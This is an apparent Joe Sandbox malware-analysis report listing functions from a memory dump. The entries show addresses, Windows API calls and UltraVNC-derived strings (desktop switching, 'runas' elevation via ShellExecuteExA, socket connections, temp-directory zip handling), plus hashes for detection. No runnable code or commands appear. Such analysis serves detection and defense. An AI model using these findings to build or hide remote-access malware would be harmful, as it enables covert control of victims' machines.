Function 00007FF790C57BB4 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 210COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF790C5407F
CloseDesktop.USER32 ref: 00007FF790C540C2

Strings

vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Desktop$CloseInputOpen
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 1367241101-3977938048
Opcode ID: 47734043b62fd5003f3baede982ab513a6c8474cbed8e2365ac637b1611529ad
Instruction ID: f5d1fd5a8d75d364645a885379d46af94fa058dbe92420e635a073e147d75037
Opcode Fuzzy Hash: 47734043b62fd5003f3baede982ab513a6c8474cbed8e2365ac637b1611529ad
Instruction Fuzzy Hash: CAB1C026A2C69185E770AB35C4587FEBBA1EF86B48F994131DA4C077A5CF38F485C720

Function 00007FF790C5593D Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 201COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790C442A0: CreateThread.KERNEL32 ref: 00007FF790C44336
Part of subcall function 00007FF790C442A0: ResumeThread.KERNEL32 ref: 00007FF790C4434C

OpenInputDesktop.USER32 ref: 00007FF790C5407F
CloseDesktop.USER32 ref: 00007FF790C540C2
GetTickCount.KERNEL32 ref: 00007FF790C541B3

Part of subcall function 00007FF790C5C4E0: timeGetTime.WINMM ref: 00007FF790C5C52A
Part of subcall function 00007FF790C5C4E0: EnterCriticalSection.KERNEL32 ref: 00007FF790C5C551
Part of subcall function 00007FF790C5C4E0: RevertToSelf.ADVAPI32 ref: 00007FF790C5C56C
Part of subcall function 00007FF790C5C4E0: LeaveCriticalSection.KERNEL32 ref: 00007FF790C5C57C

Strings

vncclient.cpp : vncClientThread , xrefs: 00007FF790C54029
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF790C54060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF790C5409A
vncservice.cpp : SelectDesktop , xrefs: 00007FF790C5404B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalDesktopSectionThread$CloseCountCreateEnterInputLeaveOpenResumeRevertSelfTickTimetime
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 186452611-3977938048
Opcode ID: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
Instruction ID: 988710bf8dcced244bde4105d2d0b2944e65fe27f201ade2e3f49f6ffa4557dd
Opcode Fuzzy Hash: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
Instruction Fuzzy Hash: 24A1CF26A2C69185E760EB35C4587FEABA1EF86B48F994031DA4C077A5CF38F485C720

Function 00007FF790C5BD70 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790CEA220: _errno.LIBCMT ref: 00007FF790CEA168
Part of subcall function 00007FF790CEA220: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CEA173

GetTempPathA.KERNEL32 ref: 00007FF790C5BDFD
sprintf.LIBCMT ref: 00007FF790C5BF6C

Part of subcall function 00007FF790CE7C50: _errno.LIBCMT ref: 00007FF790CE7C88
Part of subcall function 00007FF790CE7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE7C93

GlobalAlloc.KERNEL32 ref: 00007FF790C5BFFF

Strings

%s%s%s%s, xrefs: 00007FF790C5BF5E
!UVNCDIR-, xrefs: 00007FF790C5BF50
.zip, xrefs: 00007FF790C5BF3B
\*.*, xrefs: 00007FF790C5BFDC

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo$AllocGlobalPathTempsprintf
String ID: !UVNCDIR-$%s%s%s%s$.zip$\*.*
API String ID: 3897446562-3886131270
Opcode ID: 2256e7430c5e0a02bc82ce3aebf4d27e46064ed5cf51e837b8b2d61e65df44cc
Instruction ID: feeb24c774bf245a42cd9bd55b5676955f4a13ed4661c0d41d5c2749746a0df7
Opcode Fuzzy Hash: 2256e7430c5e0a02bc82ce3aebf4d27e46064ed5cf51e837b8b2d61e65df44cc
Instruction Fuzzy Hash: 8981C026628B8588EB20DB74D4403FDB761FB427A4F905332EA6D07BD9DF68E546C720

Function 00007FF790C9A3B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF790C9A3E3
GetThreadDesktop.USER32 ref: 00007FF790C9A3EB
GetUserObjectInformationA.USER32 ref: 00007FF790C9A411
SetThreadDesktop.USER32 ref: 00007FF790C9A471

Strings

vncservice.cpp : !GetUserObjectInformation , xrefs: 00007FF790C9A424
vncservice.cpp : SelectHDESK:!SetThreadDesktop , xrefs: 00007FF790C9A47B
vncservice.cpp : SelectHDESK to %s (%x) from %x, xrefs: 00007FF790C9A458

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Thread$Desktop$CurrentInformationObjectUser
String ID: vncservice.cpp : !GetUserObjectInformation $vncservice.cpp : SelectHDESK to %s (%x) from %x$vncservice.cpp : SelectHDESK:!SetThreadDesktop
API String ID: 3041254040-2700308907
Opcode ID: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
Instruction ID: 71694f1283bb16c2cc090ba94170b6a99006ddb5048d489049518bb88a26dd5d
Opcode Fuzzy Hash: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
Instruction Fuzzy Hash: 5E21FC75A28A8281EA70AB35B9083F6F3A4FF99744FC42032D58E46794EE7CF545C750

Function 00007FF790C43D50 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF790C43D7C
GetModuleFileNameA.KERNEL32 ref: 00007FF790C43D9C
GetForegroundWindow.USER32 ref: 00007FF790C43DAB
ShellExecuteExA.SHELL32 ref: 00007FF790C43DFA

Strings

-delsoftwarecad, xrefs: 00007FF790C43DDD
runas, xrefs: 00007FF790C43DB6
p, xrefs: 00007FF790C43DA2

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellVersionWindow
String ID: -delsoftwarecad$p$runas
API String ID: 397093096-3343046257
Opcode ID: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
Instruction ID: 6f731f1cbe730d0aaba5563e187f8d27fb1a3847347b85177efe341b4389384b
Opcode Fuzzy Hash: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
Instruction Fuzzy Hash: 4C11A536529B8186E774AB30F49939AF3B4FB89749F801235D68D02B68DF7CE158CB50

Function 00007FF790CC7400 Relevance: 12.1, APIs: 8, Instructions: 62synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790CC7320: TlsGetValue.KERNEL32(?,?,00000000,00007FF790CC7423), ref: 00007FF790CC7338
Part of subcall function 00007FF790CC7320: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF790CC7423), ref: 00007FF790CC7352
Part of subcall function 00007FF790CC7320: LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF790CC7423), ref: 00007FF790CC73E3

EnterCriticalSection.KERNEL32 ref: 00007FF790CC7427
LeaveCriticalSection.KERNEL32 ref: 00007FF790CC7472
LeaveCriticalSection.KERNEL32 ref: 00007FF790CC747B
WaitForSingleObject.KERNEL32 ref: 00007FF790CC748A
EnterCriticalSection.KERNEL32 ref: 00007FF790CC7495
GetLastError.KERNEL32 ref: 00007FF790CC74A7
EnterCriticalSection.KERNEL32 ref: 00007FF790CC74DE
LeaveCriticalSection.KERNEL32 ref: 00007FF790CC7500

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleValueWait
String ID:
API String ID: 3883107862-0
Opcode ID: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
Instruction ID: b3adcc3f83964fc8a1547bb53792d02c1a3e6304174ec77a463e114fa926c034
Opcode Fuzzy Hash: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
Instruction Fuzzy Hash: C6310B36A28B4596EB60EF30E4442A9F3B4FB88B94F842535CA8D43755CF3CE599C710

Function 00007FF790CF76E8 Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 00007FF790CF770F

Part of subcall function 00007FF790CF2ED0: _set_error_mode.LIBCMT ref: 00007FF790CF2ED9
Part of subcall function 00007FF790CF2ED0: _set_error_mode.LIBCMT ref: 00007FF790CF2EE8

Part of subcall function 00007FF790CF2C70: _set_error_mode.LIBCMT ref: 00007FF790CF2CB5
Part of subcall function 00007FF790CF2C70: _set_error_mode.LIBCMT ref: 00007FF790CF2CC6
Part of subcall function 00007FF790CF2C70: GetModuleFileNameW.KERNEL32 ref: 00007FF790CF2D28

Part of subcall function 00007FF790CEABD8: ExitProcess.KERNEL32 ref: 00007FF790CEABE7

Part of subcall function 00007FF790CF326C: malloc.LIBCMT ref: 00007FF790CF3297
Part of subcall function 00007FF790CF326C: Sleep.KERNEL32(?,?,?,00007FF790CF7749,?,?,?,00007FF790CF77F3), ref: 00007FF790CF32AA

_errno.LIBCMT ref: 00007FF790CF7751
_lock.LIBCMT ref: 00007FF790CF7765
InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FF790CF77F3), ref: 00007FF790CF777B
free.LIBCMT ref: 00007FF790CF7788
_errno.LIBCMT ref: 00007FF790CF778D
LeaveCriticalSection.KERNEL32(?,?,?,00007FF790CF77F3), ref: 00007FF790CF77B0

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
String ID:
API String ID: 113790786-0
Opcode ID: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
Instruction ID: 7f4a5d4b90329a7ac4b372dbe4a38d9c466da926bb4af0e1a4b6f2c9e25c666e
Opcode Fuzzy Hash: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
Instruction Fuzzy Hash: 1D216021E3960286F6757B70A4263B9F2A4AF42780FD45536D64E467D1CF3CF8809772

Function 00007FF790CF9A94 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 240COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF790CF37C4: GetLastError.KERNEL32(?,?,?,00007FF790CEFFD1,?,?,?,?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CF37CE
Part of subcall function 00007FF790CF37C4: FlsGetValue.KERNEL32(?,?,?,00007FF790CEFFD1,?,?,?,?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CF37DC
Part of subcall function 00007FF790CF37C4: FlsSetValue.KERNEL32(?,?,?,00007FF790CEFFD1,?,?,?,?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CF3808
Part of subcall function 00007FF790CF37C4: GetCurrentThreadId.KERNEL32 ref: 00007FF790CF381C
Part of subcall function 00007FF790CF37C4: SetLastError.KERNEL32(?,?,?,00007FF790CEFFD1,?,?,?,?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CF3834

Part of subcall function 00007FF790CF32EC: Sleep.KERNEL32(?,?,?,00007FF790CF37F7,?,?,?,00007FF790CEFFD1,?,?,?,?,00007FF790CE8C19), ref: 00007FF790CF3331

_errno.LIBCMT ref: 00007FF790CF9D9C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CF9DA7

Strings

JanFebMarAprMayJunJulAugSepOctNovDec, xrefs: 00007FF790CF9BF4
;, xrefs: 00007FF790CF9B33
gfff, xrefs: 00007FF790CF9C4C
;, xrefs: 00007FF790CF9B46

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ErrorLastValue$CurrentSleepThread_errno_invalid_parameter_noinfo
String ID: ;$;$JanFebMarAprMayJunJulAugSepOctNovDec$gfff
API String ID: 1962487656-880385205
Opcode ID: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
Instruction ID: 37fdd3ad83ee3f99b8135fc5a7b5a5a472fc9664300fe5bde8eff329f27eb478
Opcode Fuzzy Hash: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
Instruction Fuzzy Hash: 829137336141818FEB299E38C4A57E8BBE1DB62744F58C035DB488B796DA3DF509C722

Function 00007FF790C3CDC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FF790C3CDF5

Part of subcall function 00007FF790C3B550: inet_ntoa.WS2_32 ref: 00007FF790C3B59C
Part of subcall function 00007FF790C3B550: inet_ntoa.WS2_32 ref: 00007FF790C3B5B8
Part of subcall function 00007FF790C3B550: free.LIBCMT ref: 00007FF790C3B5CC
Part of subcall function 00007FF790C3B550: free.LIBCMT ref: 00007FF790C3B5D4
Part of subcall function 00007FF790C3B550: _wgetenv.LIBCMT ref: 00007FF790C3B60D

Part of subcall function 00007FF790C3B8C0: inet_addr.WS2_32 ref: 00007FF790C3B9C2
Part of subcall function 00007FF790C3B8C0: htons.WS2_32 ref: 00007FF790C3B9FE
Part of subcall function 00007FF790C3B8C0: socket.WS2_32 ref: 00007FF790C3BA13
Part of subcall function 00007FF790C3B8C0: connect.WS2_32 ref: 00007FF790C3BA2A

inet_addr.WS2_32 ref: 00007FF790C3CEA8
gethostbyname.WS2_32 ref: 00007FF790C3CEB6
closesocket.WS2_32 ref: 00007FF790C3CF0A
closesocket.WS2_32 ref: 00007FF790C3CF18

Strings

0123456789., xrefs: 00007FF790C3CE73

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: closesocketfreeinet_addrinet_ntoa$Startup_wgetenvconnectgethostbynamehtonssocket
String ID: 0123456789.
API String ID: 1515065793-2088042752
Opcode ID: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
Instruction ID: 0dfd8775ef0ab4e075976e6a83e49bbf3db9769e34a31a19000f0a7cede50e8a
Opcode Fuzzy Hash: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
Instruction Fuzzy Hash: C2418672A3468186EB34AF3198442FDA2A1FF49BA9F844231DE1D477D9EE3CF5449320

Function 00007FF790C4E320 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790C4E37F

Part of subcall function 00007FF790CE7978: malloc.LIBCMT ref: 00007FF790CE7992

InitializeCriticalSection.KERNEL32 ref: 00007FF790C4E3B1

Part of subcall function 00007FF790CF2950: RaiseException.KERNEL32 ref: 00007FF790CF29CB

InitializeCriticalSection.KERNEL32 ref: 00007FF790C4E3F9
LeaveCriticalSection.KERNEL32 ref: 00007FF790C4E462
LeaveCriticalSection.KERNEL32 ref: 00007FF790C4E48A

Strings

P, xrefs: 00007FF790C4E374
vncclient.cpp : init update thread, xrefs: 00007FF790C4E344

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$InitializeLeave$EnterExceptionRaisemalloc
String ID: P$vncclient.cpp : init update thread
API String ID: 1414418286-2218817233
Opcode ID: ddfed08e363cca9923913227180b1ae3d8e90c93c992078c94d7733d39bccdf3
Instruction ID: b681db79c4da9f808a6239ebd805cdd4d7ef679671b4c22c022298ce3cf2c71d
Opcode Fuzzy Hash: ddfed08e363cca9923913227180b1ae3d8e90c93c992078c94d7733d39bccdf3
Instruction Fuzzy Hash: 09414832629B8186E664AF71E4503A9B3A0FF49B90F845135DB9E43B94DF3CF4A48311

Function 00007FF790C5BBF0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790C5BC2F
CloseHandle.KERNEL32 ref: 00007FF790C5BCB3
DeleteFileA.KERNEL32 ref: 00007FF790C5BD40
LeaveCriticalSection.KERNEL32 ref: 00007FF790C5BD4A

Strings

!UVNCDIR-, xrefs: 00007FF790C5BD1A
f, xrefs: 00007FF790C5BC24

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

